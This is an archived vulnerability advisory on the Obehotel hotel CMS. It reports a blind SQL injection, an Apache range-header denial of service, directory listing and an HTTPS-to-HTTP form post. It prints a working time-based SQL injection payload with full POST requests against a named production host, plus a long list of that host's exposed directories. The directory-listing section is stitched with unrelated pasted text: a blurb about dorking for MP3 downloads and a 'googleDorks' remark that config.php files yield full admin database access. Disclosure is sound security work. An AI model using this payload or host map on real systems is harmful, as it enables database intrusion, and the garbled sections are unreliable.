what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Obehotel CMS Denial Of Service / SQL Injection

Obehotel CMS Denial Of Service / SQL Injection
Posted Aug 26, 2013
Authored by Juan Carlos Garcia

Obehotel CMS suffers from denial of service, insecure transit, directory listing, and remote SQL injection vulnerabilities.

tags | exploit, remote, denial of service, vulnerability, sql injection
SHA-256 | d5574eb95b9c81f907d0fcbec02ac11f615600255a8fae6dcf88f94ba7394837

Obehotel CMS Denial Of Service / SQL Injection

Change Mirror Download

OBEHOTEL (Spanish) CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post

I-VULNERABILITY
-------------------------

#Title: OBEHOTEL CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post

#Vendor:https://secureadv.obehotel.com/mpa/

#Author:Juan Carlos García (@secnight)

#Follow me

http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight



II-Introduction:
================

Obehotel is the set of different solutions, technological developments and applications directed
to hotels for online marketing and distribution aimed at improving both hoteliers processes such as customer experience.

Obehotel is the result of joint effort conducted by professionals with extensive experience in the ICT-Sector
Efimatica-and marketing professionals-Travel Tourism Sector Holidaysinspain.com-like main online distribution partner.

This union puts them as one of the major Spanish companies specializing in online distribution technology applied to the Hospitality Industry.

-------------------------

III-PROOF OF CONCEPT
====================


Attack details
--------------

Blind SqlInjection
******************

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input.

An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker.

It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases,
it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions).

If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.



Attack details
--------------

URL encoded POST input username was set to

xlgskuot' or (sleep(2)+1) limit 1 --

POST /mpa/index.php


Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ./hotel_inicio/index.php
Vary: Accept-Encoding
Content-Length: 3402
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


password=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20

variant (1)

name

POST /mpa/index.php HTTP/1.1
Content-Length: 92
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3
Host: secureadv.obehotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

password=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20



Apache httpd Remote Denial of Service
*************************************


A denial of service vulnerability has been found in the way the multiple overlapping ranges
are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

CVE-2011-3192

An attack tool is circulating in the wild. Active use of this tools has been observed.

The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.


Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).

Current version is : 2.2.16


Directory Listing
*****************

The web server is configured to display the list of files contained in this directory.
This is not recommended because the directory may contain files that are not normally
exposed through links on the web site.A user can view a list of all files from this
directory possibly exposing sensitive information.

Affected items 226

Affected items
/mpa/core
/mpa/core/ajax
/mpa/core/ajax/blog
/mpa/core/ajax/newsfeed
/mpa/core/class
/mpa/core/css
/mpa/core/css/plugins
/mpa/core/fonts
/mpa/core/images
/mpa/core/images/assets
/mpa/core/images/assets/thumb
/mpa/core/images/assets/thumb/large
/mpa/core/images/assets/thumb/medium
/mpa/core/images/assets/thumb/small
/mpa/core/images/blueline
/mpa/core/images/colorbox
/mpa/core/images/colorpicker
/mpa/core/images/contrast
/mpa/core/images/default
/mpa/core/images/greenline
/mpa/core/images/headerbg
/mpa/core/images/icons
/mpa/core/images/icons/64
/mpa/core/images/icons/blogperfume
/mpa/core/images/icons/blogperfume/Advertisment
/mpa/core/images/icons/blogperfume/Archive
/mpa/core/images/icons/blogperfume/Article
/mpa/core/images/icons/blogperfume/Author
/mpa/core/images/icons/blogperfume/Blog%20Roll
/mpa/core/images/icons/blogperfume/Comments
/mpa/core/images/icons/blogperfume/Date
/mpa/core/images/icons/blogperfume/Email
/mpa/core/images/icons/blogperfume/Plugins
/mpa/core/images/icons/blogperfume/RSS
/mpa/core/images/icons/blogperfume/Themes
/mpa/core/images/icons/blogperfume/Views
/mpa/core/images/icons_actions
/mpa/core/images/kozers
/mpa/core/images/kozers/original
/mpa/core/images/kozers/thumb
/mpa/core/images/loaders
/mpa/core/images/markers
/mpa/core/images/preview
/mpa/core/images/thumbs
/mpa/core/images/uniform
/mpa/core/js
/mpa/core/js/custom
/mpa/core/js/lang
/mpa/core/js/plugins
/mpa/core/js/plugins/ckfinder
/mpa/core/js/plugins/ckfinder/_samples/php
/mpa/core/js/plugins/ckfinder/core
/mpa/core/js/plugins/ckfinder/core/connector
/mpa/core/js/plugins/ckfinder/core/connector/php
/mpa/core/js/plugins/ckfinder/core/connector/php/lang
/mpa/core/js/plugins/ckfinder/core/connector/php/php5
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/CommandHandler
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Core
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/ErrorHandler
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Utils
/mpa/core/js/plugins/ckfinder/help
/mpa/core/js/plugins/ckfinder/help/cs/files
/mpa/core/js/plugins/ckfinder/help/en/files
/mpa/core/js/plugins/ckfinder/help/es/files
/mpa/core/js/plugins/ckfinder/help/es/files/images
/mpa/core/js/plugins/ckfinder/help/es-mx/files
/mpa/core/js/plugins/ckfinder/help/es-mx/files/images
/mpa/core/js/plugins/ckfinder/help/fi/files
/mpa/core/js/plugins/ckfinder/help/fi/files/images
/mpa/core/js/plugins/ckfinder/help/files
/mpa/core/js/plugins/ckfinder/help/files/images
/mpa/core/js/plugins/ckfinder/help/files/other
/mpa/core/js/plugins/ckfinder/help/lt/files
/mpa/core/js/plugins/ckfinder/help/lt/files/images
/mpa/core/js/plugins/ckfinder/help/pl/files
/mpa/core/js/plugins/ckfinder/lang
/mpa/core/js/plugins/ckfinder/plugins
/mpa/core/js/plugins/ckfinder/plugins/dummy
/mpa/core/js/plugins/ckfinder/plugins/dummy/lang
/mpa/core/js/plugins/ckfinder/plugins/fileeditor
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/lib
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/clike
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/css
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/htmlmixed
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/javascript
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/php
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/xml
/mpa/core/js/plugins/ckfinder/plugins/flashupload
/mpa/core/js/plugins/ckfinder/plugins/flashupload/flash
/mpa/core/js/plugins/ckfinder/plugins/gallery
/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox
/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox/images
/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox/images/ie6
/mpa/core/js/plugins/ckfinder/plugins/imageresize
/mpa/core/js/plugins/ckfinder/plugins/imageresize/images
/mpa/core/js/plugins/ckfinder/plugins/watermark
/mpa/core/js/plugins/ckfinder/plugins/zip
/mpa/core/js/plugins/ckfinder/plugins/zip/images
/mpa/core/js/plugins/ckfinder/skins
/mpa/core/js/plugins/ckfinder/skins/kama
/mpa/core/js/plugins/ckfinder/skins/kama/images
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/32
/mpa/core/js/plugins/ckfinder/skins/kama/images/loaders
/mpa/core/js/plugins/ckfinder/skins/kama/images/toolbar
/mpa/core/js/plugins/ckfinder/skins/v1
/mpa/core/js/plugins/ckfinder/skins/v1/images
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/32
/mpa/core/js/plugins/ckfinder/skins/v1/images/loaders
/mpa/core/js/plugins/ckfinder/skins/v1/images/toolbar
/mpa/core/js/plugins/ckfinder/userfiles
/mpa/core/js/plugins/tinymce
/mpa/core/js/plugins/tinymce/langs
/mpa/core/js/plugins/tinymce/plugins
/mpa/core/js/plugins/tinymce/plugins/advhr
/mpa/core/js/plugins/tinymce/plugins/advhr/css
/mpa/core/js/plugins/tinymce/plugins/advhr/js
/mpa/core/js/plugins/tinymce/plugins/advhr/langs
/mpa/core/js/plugins/tinymce/plugins/advimage
/mpa/core/js/plugins/tinymce/plugins/advimage/css
/mpa/core/js/plugins/tinymce/plugins/advimage/img
/mpa/core/js/plugins/tinymce/plugins/advimage/js
/mpa/core/js/plugins/tinymce/plugins/advimage/langs
/mpa/core/js/plugins/tinymce/plugins/advlink
/mpa/core/js/plugins/tinymce/plugins/advlink/css
/mpa/core/js/plugins/tinymce/plugins/advlink/js
/mpa/core/js/plugins/tinymce/plugins/advlink/langs
/mpa/core/js/plugins/tinymce/plugins/advlist
/mpa/core/js/plugins/tinymce/plugins/autolink
/mpa/core/js/plugins/tinymce/plugins/autoresize
/mpa/core/js/plugins/tinymce/plugins/autosave
/mpa/core/js/plugins/tinymce/plugins/autosave/langs
/mpa/core/js/plugins/tinymce/plugins/bbcode
/mpa/core/js/plugins/tinymce/plugins/contextmenu
/mpa/core/js/plugins/tinymce/plugins/directionality
/mpa/core/js/plugins/tinymce/plugins/emotions
/mpa/core/js/plugins/tinymce/plugins/emotions/img
/mpa/core/js/plugins/tinymce/plugins/emotions/js
/mpa/core/js/plugins/tinymce/plugins/emotions/langs
/mpa/core/js/plugins/tinymce/plugins/example
/mpa/core/js/plugins/tinymce/plugins/example/img
/mpa/core/js/plugins/tinymce/plugins/example/js
/mpa/core/js/plugins/tinymce/plugins/example/langs
/mpa/core/js/plugins/tinymce/plugins/example_dependency
/mpa/core/js/plugins/tinymce/plugins/fullpage
/mpa/core/js/plugins/tinymce/plugins/fullpage/css
/mpa/core/js/plugins/tinymce/plugins/fullpage/js
/mpa/core/js/plugins/tinymce/plugins/fullpage/langs
/mpa/core/js/plugins/tinymce/plugins/fullscreen
/mpa/core/js/plugins/tinymce/plugins/iespell
/mpa/core/js/plugins/tinymce/plugins/inlinepopups
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/clearlooks2
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/clearlooks2/img
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/themepixels
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/themepixels/img
/mpa/core/js/plugins/tinymce/plugins/insertdatetime
/mpa/core/js/plugins/tinymce/plugins/layer
/mpa/core/js/plugins/tinymce/plugins/legacyoutput
/mpa/core/js/plugins/tinymce/plugins/lists
/mpa/core/js/plugins/tinymce/plugins/media
/mpa/core/js/plugins/tinymce/plugins/media/css
/mpa/core/js/plugins/tinymce/plugins/media/js
/mpa/core/js/plugins/tinymce/plugins/media/langs
/mpa/core/js/plugins/tinymce/plugins/nonbreaking
/mpa/core/js/plugins/tinymce/plugins/noneditable
/mpa/core/js/plugins/tinymce/plugins/pagebreak
/mpa/core/js/plugins/tinymce/plugins/paste
/mpa/core/js/plugins/tinymce/plugins/paste/js
/mpa/core/js/plugins/tinymce/plugins/paste/langs
/mpa/core/js/plugins/tinymce/plugins/preview
/mpa/core/js/plugins/tinymce/plugins/preview/jscripts
/mpa/core/js/plugins/tinymce/plugins/print
/mpa/core/js/plugins/tinymce/plugins/save
/mpa/core/js/plugins/tinymce/plugins/searchreplace
/mpa/core/js/plugins/tinymce/plugins/searchreplace/css
/mpa/core/js/plugins/tinymce/plugins/searchreplace/js
/mpa/core/js/plugins/tinymce/plugins/searchreplace/langs
/mpa/core/js/plugins/tinymce/plugins/spellchecker
/mpa/core/js/plugins/tinymce/plugins/spellchecker/css
/mpa/core/js/plugins/tinymce/plugins/spellchecker/img
/mpa/core/js/plugins/tinymce/plugins/style
/mpa/core/js/plugins/tinymce/plugins/style/css
/mpa/core/js/plugins/tinymce/plugins/style/js
/mpa/core/js/plugins/tinymce/plugins/style/langs
/mpa/core/js/plugins/tinymce/plugins/tabfocus
/mpa/core/js/plugins/tinymce/plugins/table
/mpa/core/js/plugins/tinymce/plugins/table/css
/mpa/core/js/plugins/tinymce/plugins/table/js
/mpa/core/js/plugins/tinymce/plugins/table/langs
/mpa/core/js/plugins/tinymce/plugins/template
/mpa/core/js/plugins/tinymce/plugins/template/css
/mpa/core/js/plugins/tinymce/plugins/template/js
/mpa/core/js/plugins/tinymce/plugins/template/langs
/mpa/core/js/plugins/tinymce/plugins/visualblocks
/mpa/core/js/plugins/tinymce/plugins/visualblocks/css
/mpa/core/js/plugins/tinymce/plugins/visualchars
/mpa/core/js/plugins/tinymce/plugins/wordcount
/mpa/core/js/plugins/tinymce/themes
/mpa/core/js/plugins/tinymce/themes/advanced
/mpa/core/js/plugins/tinymce/themes/advanced/img
/mpa/core/js/plugins/tinymce/themes/advanced/js
/mpa/core/js/plugins/tinymce/themes/advanced/langs
/mpa/core/js/plugins/tinymce/themes/advanced/skins
/mpa/core/js/plugins/tinymce/themes/advanced/skins/default
/mpa/core/js/plugins/tinymce/themes/advanced/skins/default/img
/mpa/core/js/plugins/tinymce/themes/advanced/skins/highcontrast
/mpa/core/js/plugins/tinymce/themes/advanced/skins/o2k7
/mpa/core/js/plugins/tinymce/themes/advanced/skins/o2k7/img
/mpa/core/js/plugins/tinymce/themes/advanced/skins/themepixels
/mpa/core/js/plugins/tinymce/themes/advanced/skins/themepixels/img
/mpa/core/js/plugins/tinymce/themes/simple
/mpa/core/js/plugins/tinymce/themes/simple/img
/mpa/core/js/plugins/tinymce/themes/simple/langs
/mpa/core/js/plugins/tinymce/themes/simple/skins
/mpa/core/js/plugins/tinymce/themes/simple/skins/default
/mpa/core/js/plugins/tinymce/themes/simple/skins/o2k7
/mpa/core/js/plugins/tinymce/themes/simple/skins/o2k7/img
/mpa/core/js/plugins/tinymce/utils
/mpa/core/lang
/mpa/core/pdf


Files uploaded through FTP

Affected items

/mpa/core/js/plugins/ckfinder/core/connector/php/php5/CommandHandler
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/ErrorHandler
/mpa/core/js/plugins/ckfinder/help/files/images
/mpa/core/js/plugins/ckfinder/plugins
/mpa/core/js/plugins/ckfinder/plugins/flashupload
/mpa/core/js/plugins/ckfinder/plugins/flashupload/flash



Mp3 file


Yes! I probably have should have told you guys earlier,
but this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it...

a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching
b)a lot of the time google gives you results and they are not there thanks to good old friend 404
c)finding stuff takes a lot of practice.

Goods...

a)ive found whole albums
b)ive mass downloaded directories of hundreds of songs that i have intrest in
c)its exciting seeing the results, like fining treasure.

Affected items

/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/32
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/32



PHP configuration file (config.php)


This search brings up sites with "config.php" files. To skip the technical discussion,
this configuration file contains both a username and a password for an SQL database.
Most sites with forums run a PHP message base. This file gives you the keys to that forum,
including FULL ADMIN access to the database. Way to go, googleDorks!!

Affected items

/mpa/core/js/plugins/ckfinder
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Core


Insecure transition from HTTPS to HTTP in form post
***************************************************
This secure (https) page contains a form that is posting to an insecure (http) page.
This could confuse users who may think their data is encrypted when in fact it's not.

This vulnerability affects

/mpa/core/js/plugins/ckfinder/help/es/files/suggestions.html.

Attack details
--------------

Form name: ""

Form action: "http://cksource.com/ckfinder/doc_suggestion"

GET /mpa/core/js/plugins/ckfinder/help/es/files/suggestions.html

Referer: https://secureadv.obehotel.com/mpa/core/js/plugins/ckfinder/help/es/files/toc.html

Cookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3

Host: secureadv.obehotel.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

Accept: */*

Response:

Server: Apache/2.2.16 (Debian)
Last-Modified: Fri, 24 Aug 2012 02:49:24 GMT

ETag: "30119b-696-4c7fa060b5500"

Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1686
Keep-Alive: timeout=15, max=29
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-15


IV. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)

Special thanks to Javier Garcia Garcia for showing me this Spanish "CMS" for Penetration Testing

V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close